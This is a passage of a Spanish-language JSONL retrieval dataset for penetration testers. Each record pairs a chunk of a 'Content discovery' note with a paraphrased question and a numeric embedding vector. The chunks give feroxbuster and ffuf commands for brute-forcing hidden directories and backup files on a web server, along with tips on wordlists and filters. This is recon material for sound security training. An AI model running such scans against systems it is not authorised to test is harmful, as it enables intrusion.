-0.01319, 0.04343, 0.02869, 0.06376, -0.01109, -0.00228, 0.03436, -0.00588, -0.00909, -0.02854, -0.01664, -0.05895, -0.04981, -0.07548, 0.03194, 0.03121, -0.04575, 0.02646, 0.02486, -0.0753, 0.05002, -0.00495, 0.04061, 0.02822, -0.00569, -0.0211, -0.0814, -0.02045, -0.00338, 0.01479, -0.02648, -0.02218, 0.04058, 0.02995, -0.04686, 0.01912, 0.00252]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# feroxbuster (RECURSIVO automΓ‘tico, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "indexar": "ΒΏHay algΓΊn programa que permita hacer bΓΊsquedas recursivas automΓ‘ticas de archivos en un servidor web?", "v": [0.06237, 0.07983, -0.13547, -0.21479, -0.02109, -0.08689, 0.07287, -0.11328, -0.03527, -0.03206, -0.02142, -0.13651, 0.06463, 0.00182, 0.10898, 0.07317, 0.21175, -0.02922, 0.10178, 0.10692, 0.04305, 0.00385, -0.05384, 0.00748, -0.05859, -0.08735, 0.05071, 0.03578, -0.19968, -0.0934, -0.00819, 0.05983, 0.02785, -0.01937, -0.09054, 0.01926, 0.03835, 0.13304, -0.04637, 0.00251, 0.04708, 0.0247, -0.17156, 0.00815, -0.0468, -0.04059, 0.04176, -0.08206, 0.00959, -0.07581, -0.03025, -0.09377, -0.13992, -0.01342, -0.00284, -0.05652, 0.07775, -0.14275, -0.00573, -0.18657, -0.1333, 0.03129, 0.0628, 0.00688, 0.00664, 0.05931, 0.10738, -0.02293, 0.00547, 0.08928, -0.04548, 0.01524, 0.01991, -0.04537, 0.09711, 0.06818, 0.02894, -0.04916, 0.04487, 0.10086, -0.02954, -0.0411, -0.00631, 0.08554, -0.1017, -0.04912, 0.00872, -0.01967, 0.06678, -0.0477, 0.04156, 0.03466, -0.07364, 0.09205, 0.02154, -0.09572, 0.1406, -0.01431, 0.00085, 0.04911, -0.01089, -0.03412, -0.02462, 0.14885, -0.01693, 0.16546, 0.10329, 0.02563, -0.02434, -0.01277, 0.09721, -0.004, 0.00248, -0.01418, -0.10285, 0.03337, -0.00455, -0.02003, 0.0618, -0.00842, -0.04681, 0.05714, 0.01778, 0.01623, 0.05605, -0.01121, 0.04298, 0.07894, -0.06629, 0.01114, 0.04407, 0.00657, -0.07843, -0.02673, -0.05195, 0.0226, 0.11644, 0.02288, -0.0459, -0.07527, 0.08391, 0.01998, 0.01272, -0.00237, 0.12522, 0.00337, 0.05234, -0.06654, -0.05086, -0.03136, -0.01218, -0.03835, -0.00469, 0.01588, -0.07866, 0.02584, -0.00021, -0.11356, -0.04696, 0.06973, -0.06142, 0.10497, -0.02075, 0.05538, 0.04165, 0.05186, -0.04976, 0.02835, 0.07705, 0.0289, -0.05538, -0.02159, -0.06443, -0.10877, 0.02381, 0.07161, -0.03503, -0.03144, 0.05419, -0.04944, -0.00247, -0.02598, -0.0093, 0.01209, -0.00676, -0.03713, 0.04733, 0.02053, 0.01617, 0.023, -0.00153, -0.01622, -0.1211, -0.00728, 0.02268, -0.00373, -0.04335, 0.0003, 0.04127, -0.0503, -0.06108, -0.04527, -0.00663, 0.01042, -0.01207, 0.06451, 0.0103, -0.03277, 0.05206, 0.04707, -0.01636, -0.02655, 0.08916, -0.01633, -0.06356, -0.03325, 0.03001, -0.0463, -0.01873, -0.00969, 0.04299, -0.00585, 0.02792, 0.08985, 0.02966, 0.00189, 0.04406, 0.0207, 0.02601, -0.04461, -0.05708, 0.00975, -0.03473, -0.03349, 0.00471, -0.0431, 0.00577, -0.05568, -0.01028, -0.06427, -0.02519, 0.02838, 0.00775, 0.00693, -0.03955, -0.04881, -0.03243, -0.01842, 0.00063, 0.00893, -0.00394, -0.0271, -0.04943, -0.04588, 0.05307, -0.01499]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# feroxbuster (RECURSIVO automΓ‘tico, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "indexar": "ΒΏCon quΓ© herramienta puedo realizar un descubrimiento exhaustivo de carpetas ocultas en una pΓ‘gina web?", "v": [0.16466, 0.03882, -0.19087, -0.02817, 0.04534, -0.11396, -0.0164, 0.07473, -0.05156, -0.07226, -0.13379, -0.10954, -0.10476, 0.06982, 0.04808, 0.07162, 0.15806, -0.06045, 0.00428, -0.06064, -0.00218, -0.05639, -0.07575, -0.0515, -0.12466, -0.01663, 0.06118, 0.06425, -0.10413, 0.01086, -0.04076, 0.14433, -0.04792, 0.05754, -0.11902, 0.02091, -0.04579, -0.01895, -0.02709, -0.06044, 0.03838, -0.02941, -0.06281, 0.13183, 0.01386, 0.01019, -0.08699, -0.0359, -0.08175, 0.04264, -0.0824, -0.14069, -0.18168, -0.04829, -0.00648, -0.15646, 0.16877, -0.06034, 0.13129, -0.017, -0.01995, -0.00631, -0.05719, 0.04306, -0.02936, -0.10495, -0.0421, -0.023, 0.02291, 0.12988, -0.01794, 0.00372, 0.10796, 0.04454, 0.0346, 0.01598, -0.01453, -0.02519, 0.01013, 0.0085, 0.01963, 0.0523, -0.08315, 0.01964, -0.09556, -0.09416, -0.00352, -0.02204, -0.08339, -0.17179, 0.00319, 0.03393, -0.13847, 0.06982, -0.02584, -0.05113, 0.07091, 0.00947, -0.03541, -0.01754, -0.00938, -0.00605, -0.09652, 0.03836, -0.00529, 0.11078, -0.05963, -0.02534, -0.06935, -0.09527, 0.10331, 0.02306, -0.05199, -0.056, -0.04136, 0.1013, 0.0353, 0.01482, -0.04083, -0.09095, -0.06916, 0.00576, -0.01255, 0.01544, 0.00292, -0.06503, -0.02453, 0.09629, 0.01905, -0.06801, -0.04201, -0.0481, -0.10071, 0.02331, 0.00208, 0.04324, -0.01694, -0.06035, 0.04056, 0.00245, 0.09503, -0.06238, -0.06943, -0.10493, 0.05767, -0.01927, 0.03599, 0.01309, -0.09913, -0.01608, -0.03611, -0.01827, 0.02349, 0.00693, 0.00949, 0.03942, 0.02217, 0.01106, -0.05787, -0.02043, -0.05955, -0.01244, -0.00106, -0.03043, 0.01472, -0.02377, -0.07548, -0.02399, -0.00287, 0.06606, 0.04122, 0.05106, 0.01832, -0.12556, -0.00658, -0.01398, 0.00746, -0.04119, 0.06726, -0.03383, -0.02136, 0.0094, -0.01361, -0.04966, -0.04001, -0.03247, 0.10398, -0.10193, -0.03681, 0.03298, 0.07317, 0.02313, -0.01096, 0.05613, -0.06457, -0.03615, 0.02425, -0.04332, 0.04939, -0.04188, -0.04943, -0.01077, -0.03126, -0.06081, -0.01571, 0.00207, -0.07537, -0.02795, -0.06454, 0.02099, 0.07226, -0.04066, 0.09658, -0.07763, -0.01001, -0.03644, 0.00651, -0.00708, -0.03408, -0.04762, 0.08559, 0.01516, 0.07406, -0.02039, 0.07346, 0.03679, 0.0196, 0.07485, 0.0279, -0.02175, 0.02622, -0.01118, -0.02001, -0.02606, 0.04516, -0.00884, 0.00394, -0.02134, -0.06868, 0.00492, -0.02595, 0.04612, 0.04403, -0.03091, 0.00153, -0.08582, -0.0216, 0.01366, -0.00602, -0.08158, -0.07294, -0.00415, 0.05672, -0.05682, 0.04254, -0.02702]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# feroxbuster (RECURSIVO automΓ‘tico, el favorito para OSCP)\nferoxbuster -u http://IP -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt,bak", "indexar": "ΒΏQuΓ© alternativa automΓ‘tica existe para encontrar recursos como archivos PHP o backups en una direcciΓ³n IP especΓ­fica?", "v": [-0.07311, 0.09818, -0.0478, -0.23701, 0.04452, -0.18573, 0.05869, -0.11741, -0.22778, -0.02002, -0.01129, -0.12629, 0.01521, -0.03902, -0.01078, -0.04036, -0.00935, -0.05849, 0.10947, -0.16037, -0.05723, 0.02491, -0.127, -0.00515, -0.08118, -0.03027, -0.03204, 0.11573, -0.21722, -0.07989, 0.05415, 0.02631, 0.01794, 0.04787, -0.2119, 0.08002, 0.11537, 0.15028, -0.0681, -0.04802, 0.01175, 0.04995, -0.0636, 0.09748, -0.01229, 0.02889, 0.05883, -0.02157, 0.03024, -0.04235, -0.08322, -0.04597, -0.10752, 0.01042, -0.03162, -0.01828, 0.04347, -0.1237, -0.01221, -0.0045, -0.18439, 0.1271, -0.04803, -0.04877, 0.01499, 0.05768, -0.01781, -0.02037, -0.10603, 0.01638, -0.05192, -0.00636, -0.00668, -0.00735, 0.01366, 0.01033, 0.07805, 0.00172, -0.0676, 0.00926, -0.02496, 0.00221, 0.00556, 0.05223, -0.08924, -0.10546, 0.01269, -0.04944, 0.03009, -0.07312, 0.0549, 0.03289, -0.02927, 0.10115, -0.08178, -0.03839, 0.04104, -0.0397, -0.09368, -0.01325, -0.0653, 0.03728, -0.01075, 0.12849, 0.17993, 0.03682, 0.1225, 0.07063, -0.02943, -0.02276, 0.00101, 0.00918, 0.02697, 0.01449, 0.01596, -0.00221, 0.07343, 0.00723, -0.00475, 0.00492, 0.00421, -0.01306, -0.04668, -0.02519, 0.08005, 0.01825, 0.03417, 0.08052, -0.02545, -0.00728, 0.06317, -0.08585, -0.06404, -0.09001, -0.03364, 0.03813, 0.08182, 0.08058, -0.0171, -0.03326, -0.01491, -0.08541, -0.01372, -0.01634, 0.04617, -0.10215, 0.0334, -0.04783, 0.02095, -0.05519, -0.05076, -0.04643, 0.00262, 0.00756, -0.09192, 0.07768, -0.01613, -0.04279, -0.10196, 0.04084, 0.00872, -0.02609, 0.02457, 0.01343, -0.05368, -0.01239, -0.05252, 0.01197, 0.0556, -0.04109, 0.03056, 0.06832, -0.00414, -0.11314, -0.05901, -0.03578, 0.01426, -0.08083, 0.06436, -0.02913, 0.04282, -0.06843, -0.03905, 0.04697, 0.06768, -0.03701, 0.10937, 0.04672, -0.02904, 0.02236, -0.01708, -0.04688, -0.01863, -0.04847, -0.03076, -0.04315, -0.0265, -0.04944, -0.03451, 0.02796, -0.05165, -0.01542, -0.00204, -0.00856, 0.03441, 0.01416, -0.02994, 0.00243, 0.00104, -0.05306, 0.00783, 0.02279, 0.09143, 0.00644, -0.05488, -0.02517, -0.02723, 0.02637, -0.02138, -0.01495, -0.03552, -0.01506, 0.02156, 0.01234, 0.02933, -0.00526, -0.03495, 0.0159, -0.04364, -0.00507, -0.03446, 0.07174, 0.00899, -0.00581, 0.03902, -0.02632, -0.04167, 0.00497, 0.03291, 0.01617, 0.01041, 0.0444, 0.00959, 0.01809, -0.0372, 0.00243, -0.02531, 0.03666, -0.01295, -0.00379, 0.01676, 0.00046, -0.04807, 0.05654, 0.01616, 0.01821]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# ffuf (el mΓ‘s flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "indexar": "QuΓ© herramienta sirve para hacer pruebas de intrusiΓ³n rΓ‘pidas en un servidor web?", "v": [-0.0615, 0.07645, -0.26166, -0.20452, 0.03109, -0.12632, -0.04847, -0.09019, 0.16696, -0.03683, -0.09269, -0.01782, 0.04127, -0.11309, 0.01545, 0.10606, 0.14644, -0.07638, 0.03746, 0.00235, -0.03525, 0.03885, -0.0676, -0.04278, -0.13559, 0.00099, 0.01054, -0.00332, -0.14085, -0.03663, -0.05953, 0.00157, 0.06281, 0.0126, -0.11705, -0.09692, -0.02284, 0.10092, -0.01704, 0.09542, 0.03442, -0.00198, -0.08281, 0.0053, 0.04868, -0.00997, 0.02049, -0.04011, 0.03386, 0.09572, -0.06241, -0.14804, -0.0813, -0.04871, -0.0528, -0.06813, 0.12787, -0.18132, 0.02853, -0.10586, -0.14975, -0.03038, -0.06661, -0.03924, 0.03633, -0.02818, -0.01706, -0.02206, -0.02873, -0.00423, -0.06044, 0.01758, 0.09049, -0.10255, -0.04269, -0.02955, -0.02943, 0.02683, 0.06832, 0.02844, 0.08723, 0.03668, -0.05364, 0.02035, -0.08974, -0.08037, 0.01364, -0.07562, 0.03694, -0.02102, 0.0661, 0.11334, -0.01665, 0.08413, 0.05858, -0.05242, 0.10476, -0.04909, 0.05083, -0.04748, 0.12705, -0.0198, -0.14125, 0.0592, -0.06549, 0.05138, 0.01, 0.0008, -0.05312, -0.06012, 0.09851, 0.00132, -0.09505, -0.02866, -0.02601, 0.01662, -0.01427, -0.04253, -0.01821, 0.01312, -0.0643, 0.00081, -0.03886, 0.01557, -0.06917, -0.05709, 0.03084, -0.01625, 0.00269, -0.03907, 0.02448, -0.05787, -0.09965, 0.02784, 0.01302, -0.03358, 0.02391, -0.10007, -0.07149, -0.04053, 0.07252, -0.00605, -0.03652, -0.04488, 0.04387, 0.02152, 0.07022, -0.01527, -0.0861, 0.05592, -0.02888, -0.05111, -0.06389, 0.06256, -0.09566, -0.07147, 0.00734, -0.07342, -0.12084, 0.07682, -0.00402, 0.04104, 0.05863, 0.06999, -0.00046, -0.00589, -0.01929, 0.01813, 0.04975, 0.04155, -0.02856, 0.0404, 0.00992, -0.08305, 0.06024, 0.02984, -0.10486, -0.02916, -0.02037, -0.06266, -0.01669, -0.00644, -0.05496, 0.00525, 0.02152, -0.0352, 0.06902, -0.02054, 0.01821, 0.04193, 0.03642, 0.02783, -0.05874, 0.00811, 0.05767, 0.01108, -0.01333, -0.05053, -0.01416, -0.04996, -0.06143, -0.10387, -0.03753, -0.05976, -0.04459, 0.0578, -0.00565, -0.02187, -0.01724, 0.02737, -0.00956, 0.03856, 0.1186, -0.07551, -0.04053, 0.00241, 0.07187, -0.01669, -0.0577, -0.03606, 0.00859, 0.00877, -0.01678, 0.02306, 0.00299, 0.08463, 0.02067, -0.03447, 0.0319, 0.00629, 0.0134, -0.01046, -0.01722, -0.02804, 0.01819, -0.07452, 0.01121, -0.04595, -0.04349, -0.06743, -0.01317, 0.02892, -0.00991, -0.02168, -0.02201, -0.04863, 0.02343, -0.05633, -0.02707, -0.04958, -0.0248, -0.06144, 0.0282, -0.04694, 0.05457, 0.01156]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# ffuf (el mΓ‘s flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "indexar": "Con quΓ© puedo escanear directorios y verificar extensiones en una pΓ‘gina web?", "v": [0.02879, 0.11386, -0.17541, -0.02994, 0.1399, -0.01994, 0.11938, -0.07995, -0.051, -0.06008, -0.17056, -0.05159, -0.18683, -0.25002, 0.09308, -0.00085, 0.11888, -0.07162, 0.12362, 0.01016, 0.0487, -0.10298, -0.10195, -0.05452, -0.10343, 0.06701, -0.18914, -0.01411, -0.02077, 0.00847, -0.02596, 0.09295, 0.00615, 0.10392, -0.09186, 0.0915, 0.07602, -0.00762, 0.06034, 0.01169, 0.0221, -0.02636, -0.11849, -0.04153, -0.08297, -0.05146, -0.03491, -0.00373, 0.02709, -0.00405, 0.00358, 0.04332, -0.13173, 0.06136, -0.06593, -0.0704, 0.12025, -0.06241, 0.07863, 0.01299, 0.02664, 0.03058, 0.00182, 0.02847, -0.00365, -0.01534, -0.02821, -0.01159, -0.03198, 0.01799, -0.16643, 0.12513, 0.06216, 0.02435, -0.05618, -0.02851, 0.03125, -0.05811, 0.06649, 0.08257, 0.05025, 0.02912, -0.06146, -0.01551, -0.14255, 0.01138, -0.11004, -0.09271, 0.04724, -0.14593, 0.1353, 0.06488, -0.07096, 0.01652, -0.07535, -0.08488, 0.02957, 0.01525, 0.04423, -0.03765, -0.04841, 0.01424, -0.03736, 0.12037, 0.05635, 0.02493, 0.01383, -0.01623, -0.0607, 0.0155, 0.04905, 0.00885, -0.0992, -0.11529, -0.01983, -0.01477, -0.05851, 0.01766, 0.02597, -0.04425, -0.02223, -0.04767, -0.01931, 0.07643, -0.05411, -0.0234, -0.01388, 0.10016, 0.01627, -0.00416, -0.033, -0.09661, -0.06788, -0.04266, 0.02079, 0.04508, -0.01792, -0.02088, 0.0389, -0.02172, -0.03612, -0.03059, -0.00881, 0.01595, 0.03838, -0.01678, -0.10474, -0.01418, -0.13521, -0.045, 0.00391, -0.02225, -0.025, 0.11424, -0.02877, 0.05225, 0.05145, 0.01667, 0.05513, 0.0347, 0.01747, 0.00766, 0.02879, 0.02983, -0.00833, 0.02826, -0.07193, 0.04576, 0.02946, 0.00406, -0.00539, 0.0233, -0.03444, -0.14364, 0.03873, 0.00741, -0.0353, 0.00354, 0.0579, 0.00298, -0.04234, 0.00884, 0.01371, -0.02792, -0.07978, -0.05381, 0.01135, -0.01704, -0.03515, 0.03625, 0.05752, 0.03066, -0.01765, 0.0103, 0.02937, 0.01315, -0.00232, -0.03839, -0.00267, -0.06851, -0.0805, 0.00738, -0.01876, -0.06571, 0.05617, -0.01501, 0.01776, -0.04111, -0.01837, 0.01082, 0.0401, -0.04031, 0.03884, -0.07446, -0.03947, -0.03371, 0.06637, 0.03786, -0.07491, -0.0732, -0.01978, 0.01482, -0.00603, -0.00882, 0.04718, 0.04738, 0.01696, 0.00538, 0.0254, 0.04491, -0.05116, -0.00988, -0.0273, -0.08307, 0.04805, 0.00246, 0.01166, 0.07034, -0.00223, 0.04254, -0.00238, 0.09543, -0.01113, 0.00127, -0.02586, -0.04124, -0.10019, -0.00773, -0.01976, -0.04102, -0.03222, -0.01886, 0.00477, -0.06464, 0.00204, -0.007]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "# ffuf (el mΓ‘s flexible: filtros, vhosts, params)\nffuf -u http://IP/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -e .php,.txt\n```", "indexar": "ΒΏCuΓ‘l es una alternativa libre a Nmap para el descubrimiento de servicios web?", "v": [-0.03527, 0.0504, -0.02212, -0.07285, -0.05418, -0.03658, -0.11581, -0.07138, -0.0972, -0.02701, -0.08743, -0.21858, -0.03297, 0.06094, -0.05173, 0.00203, 0.0525, -0.08438, 0.14994, 0.01984, -0.10313, -0.0251, -0.14079, -0.09803, -0.05623, -0.09779, -0.02546, 0.00726, -0.06956, 0.08581, -0.02041, 0.00326, -0.05891, 0.02403, -0.08797, 0.07718, 0.21891, -0.07505, -0.00555, -0.12819, -0.0494, -0.15259, 0.04377, 0.17235, -0.07521, -0.04618, -0.09839, -0.03534, -0.01122, -0.00037, -0.03389, -0.03167, -0.15146, 0.01956, 0.03172, -0.01305, 0.07492, -0.05194, -0.01033, -0.05788, -0.11662, -0.04828, -0.03431, -0.05704, 0.05672, -0.16726, -0.07478, 0.05521, -0.03184, 0.0623, 0.0803, -0.05829, 0.05767, 0.01938, -0.08105, 0.06898, -0.04691, -0.01576, 0.02132, 0.05797, 0.1072, 0.03547, -0.04346, -0.01011, -0.03579, -0.03366, 0.06296, -0.06723, 0.01287, -0.06085, 0.04033, 0.10983, -0.08011, 0.18686, -0.04576, -0.09354, 0.02929, 0.03018, 0.00056, 0.04937, 0.09326, 0.02181, -0.07442, 0.02501, 0.01854, 0.06083, 0.08603, 0.04094, -0.14453, -0.03778, 0.04369, 0.03672, -0.06346, -0.02625, -0.05144, 0.01788, 0.03308, 0.06193, -0.06077, -0.04638, -0.05408, -0.00435, -0.00396, -0.02046, -0.02104, 0.02296, -0.03826, 0.05173, -0.00045, -0.01992, 0.05647, -0.05857, -0.08367, -0.02149, -0.01965, -0.00954, 0.03137, -0.06201, 0.06518, 0.08126, 0.09897, -0.05954, -0.02819, -0.03881, 0.01573, -0.05589, 0.06233, -0.00034, -0.09163, -0.00613, -0.12813, 0.00976, -0.05951, 0.0805, -0.04464, 0.01313, -0.02406, -0.01845, -0.10545, 0.06323, -0.00303, -0.00777, 0.02601, 0.0246, -0.01078, 0.03525, -0.00321, -0.05333, -0.02935, 0.03227, 0.00768, 0.09787, 0.05319, -0.16714, 0.05728, -0.01694, -0.0021, -0.06007, 0.0791, -0.03743, 0.03626, 0.04801, -0.07997, 0.00311, -0.10153, -0.01412, 0.02379, -0.09144, -0.02585, 0.02659, -0.02075, -0.03059, -0.03039, 0.02215, -0.07186, -0.06991, 0.02838, -0.07526, -0.06871, -0.04785, -0.04993, -0.04166, -0.05475, 0.00261, -0.09296, -0.02423, -0.024, 0.02219, 0.00731, 0.01736, 0.04436, -0.01649, 0.12804, -0.03667, -0.06729, -0.06144, 0.02117, -0.00688, 0.00933, -0.01751, 0.0653, 0.03098, -0.00489, 0.01577, 0.02395, -0.05055, 0.05996, 0.05793, 0.01062, 0.00325, 0.03913, 0.00716, 0.00512, -0.01133, 0.00418, -0.02743, -0.00296, 0.00184, -0.00855, -0.00886, 0.01192, 0.08364, -0.02007, 0.02436, 0.02439, -0.05993, 0.01215, -0.01654, -0.04898, -0.02889, -0.03185, 0.01419, 0.05085, -0.00927, 0.05984, 0.02172]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba segΓΊn la tecnologΓ­a β†’ `php`, `asp`, `aspx`, `txt`, `bak`, `zip`, `old`.\n- **RecursiΓ³n**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeraciΓ³n).\n- **Filtrar ruido** en ffuf: `-fc 404` (cΓ³digo), `-fs 1234` (tamaΓ±o), `-mc 200,301,302`.", "indexar": "con quΓ© puedo bajar solo las carpetas que encuentra sin hacer ruido?", "v": [-0.02832, 0.06429, -0.21901, 0.02338, -0.05988, -0.05711, 0.04769, 0.16098, -0.02306, -0.1143, -0.13503, -0.09265, -0.05372, 0.0143, 0.01377, 0.02796, -0.05019, 0.143, -0.00919, -0.05344, 0.07432, -0.12503, 0.04737, 0.00656, -0.14804, 0.08726, 0.18289, 0.07278, -0.14151, 0.03027, -0.05081, 0.15005, 0.13895, -0.03555, -0.12746, -0.03615, -0.00506, 0.05574, -0.10717, -0.03027, 0.04308, 0.14449, -0.0456, 0.02183, -0.0377, -0.08664, -0.04027, -0.07503, -0.03907, -0.00214, -0.12207, -0.10911, 0.03489, -0.11323, 0.0404, -0.11892, 0.10445, -0.01682, 0.07707, -0.14669, 0.03362, 0.01293, -0.02723, 0.03546, 0.02656, 0.00135, 0.1018, 0.00993, 0.07766, 0.0155, -0.04615, -0.00173, 0.05058, -0.02403, 0.08912, 0.05506, -0.07039, -0.10447, -0.0206, 0.04617, 0.07469, -0.01514, -0.01087, 0.00831, -0.04557, -0.10673, 0.02333, -0.10377, -0.0711, -0.03953, 0.01092, 0.03019, -0.02361, 0.01384, 0.06081, 0.00882, 0.08346, 0.05838, -0.07379, 0.07143, 0.04721, -0.03067, -0.04039, 0.01625, 0.02864, 0.08044, 0.00334, -0.07314, 0.0676, -0.16112, 0.04277, 0.02588, 0.00304, -0.00468, -0.08955, -0.05037, -0.03356, -0.05885, 0.00631, 0.06229, -0.01881, -0.00487, 0.02446, -0.01596, -0.00293, -0.07183, 0.09151, 0.03099, 0.02187, 0.05436, 0.03796, 0.07937, 0.00349, -0.02761, -0.02943, 0.01423, -0.10629, -0.02887, 0.08508, -0.06279, 0.09765, 0.03281, -0.00534, -0.03005, 0.02135, 0.03742, 0.02291, -0.05699, -0.02794, -0.03499, 0.05637, 0.05005, 0.0239, -0.00781, 0.01878, 0.05097, 0.1007, -0.0762, 0.02299, -0.00942, -0.03339, 0.06049, -0.03388, -0.04723, 0.08466, 0.00193, -0.06121, -0.0257, 0.02139, 0.05964, -0.10297, -0.02965, 0.01988, -0.07215, -0.05901, -0.01866, 0.03513, -0.01743, 0.04304, -0.01624, -0.07096, 0.0419, -0.04476, -0.0272, 0.0089, -0.00802, 0.04868, 0.0005, -0.02721, 0.023, 0.05251, 0.07639, -0.0108, 0.01854, -0.06037, -0.0619, 0.01167, -0.00968, 0.00085, 0.01589, -0.08579, -0.04162, -0.03672, -0.0593, 0.08798, 0.04717, -0.03897, 0.03891, -0.00498, 0.07904, 0.06665, 0.00754, -0.00313, -0.03542, -0.03052, 0.07459, 0.0171, -0.01243, -0.0062, -0.00315, 0.10208, 0.0716, 0.12628, 0.00095, 0.04391, 0.04775, 0.03443, -0.01903, 0.054, 0.07059, 0.01767, 0.03133, -0.00124, -0.02033, 0.02553, 0.07488, -0.07172, -0.0607, -0.07834, -0.03744, -0.00041, 0.01879, -0.02709, -0.03143, 0.00421, -0.06609, -0.04125, 0.0828, 0.01389, -0.08509, -0.01772, 0.00048, 0.04184, -0.04486, 0.0215, -0.06453]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba segΓΊn la tecnologΓ­a β†’ `php`, `asp`, `aspx`, `txt`, `bak`, `zip`, `old`.\n- **RecursiΓ³n**: feroxbuster baja solo a las carpetas que encuentra (gobuster no).\n- **Wordlists**: `raft-large-words`, `directory-list-2.3-medium`. `common.txt` es nivel junior (Trampas de enumeraciΓ³n).\n- **Filtrar ruido** en ffuf: `-fc 404` (cΓ³digo), `-fs 1234` (tamaΓ±o), `-mc 200,301,302`.", "indexar": "quΓ© alternativa a gobuster tiene recursiΓ³n automΓ‘tica?", "v": [-0.10811, 0.08991, -0.18047, -0.06416, 0.08043, 0.0698, -0.0161, -0.04495, -0.18983, -0.02119, -0.06065, -0.16232, 0.04473, 0.12813, 0.09942, -0.0791, -0.07521, 0.03724, 0.04459, 0.03556, 0.02238, -0.12655, 0.02272, 0.03939, 0.06541, -0.03106, 0.00118, 0.0151, -0.15204, -0.08531, 0.11249, 0.03271, 0.05331, -0.10278, -0.18981, 0.04367, 0.06346, 0.13977, -0.01247, -0.00139, 0.01806, -0.03047, -0.06165, 0.01604, -0.04838, -0.00818, 0.006, 0.04716, -0.09989, 0.04696, -0.02081, -0.03983, -0.11216, -0.01031, 0.06544, -0.03347, 0.10166, -0.0468, 0.08621, -0.16396, -0.0345, 0.08824, -0.0373, -0.01966, 0.02467, 0.11174, -0.00905, -0.07541, 0.08418, 0.04065, -0.0322, -0.06319, 0.0591, -0.05603, 0.05163, 0.09507, 0.03667, 0.10053, 0.11958, 0.14392, -0.07733, -0.10488, 0.06085, 0.01564, 0.04069, -0.03988, 0.02151, -0.11792, 0.08721, -0.04244, 0.01268, -0.0877, 0.07861, 0.09745, 0.01724, -0.03875, 0.03051, 0.00428, -0.08471, 0.0239, 0.07278, -0.01769, -0.0827, 0.157, 0.06342, 0.00074, -0.0353, 0.06691, -0.11002, -0.02897, -0.0005, 0.07666, 0.01234, -0.02337, 0.00473, 0.01477, -0.06956, 0.03489, -0.06449, 0.11751, -0.00192, 0.05642, 0.00052, -0.0634, 0.06343, 0.00566, 0.03927, 0.07696, -0.03013, -0.05633, 0.01837, -0.08162, -0.06032, -0.08335, -0.09239, 0.00382, 0.0391, -0.01576, 0.10049, -0.05535, 0.04382, 0.03249, 0.02193, -0.05223, -0.04022, -0.0529, 0.08838, -0.03073, 0.06278, 0.01083, -0.02416, -0.02909, 0.03727, 0.12809, -0.01183, 0.032, -0.0001, -0.03206, 0.02115, 0.08976, 0.0068, -0.09369, -0.01342, 0.06925, 0.00756, 0.03357, -0.07307, -0.09732, -0.01084, 0.01414, -0.03381, -0.04857, 0.04946, -0.05542, -0.00164, -0.02078, -0.00362, -0.00628, 0.02594, -0.1106, 0.01028, -0.00767, -0.07296, -0.00391, 0.05154, -0.05589, 0.01089, 0.03567, 0.06104, 0.03347, -0.04138, 0.06668, -0.01972, -0.09875, 0.00707, -0.02585, 0.01133, -0.05661, 0.02298, 0.01931, -0.07326, -0.01972, 0.03559, 0.0025, 0.02449, 0.07611, -0.00732, 0.05443, 0.04331, 0.06167, 0.04779, -0.00908, 0.10452, 0.04387, -0.01673, 0.0159, 0.00399, -0.05806, -0.06857, -0.01049, 0.07666, -0.02016, 0.00023, 0.08172, 0.00246, 0.01612, 0.02949, 0.07178, -0.01728, -0.00734, -0.0368, 0.07277, 0.01016, -0.01241, 0.00619, -0.0183, -0.02199, 0.01234, 0.05141, -0.00085, -0.01925, 0.03562, -0.01619, 0.07952, -0.03303, -0.03143, -0.03977, -0.01159, 0.00736, 0.05882, -0.00993, 0.04552, -0.04096, -0.00543, 0.03567, 0.00232]} +{"tipo": "pregunta", "herramienta": "Content discovery", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Content discovery.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Lo que importa\n- **Extensiones** (`-x` / `-e`): prueba segΓΊn la tecnologΓ­a β†’ `php`, `asp`, `aspx`, `txt`, `bak`, 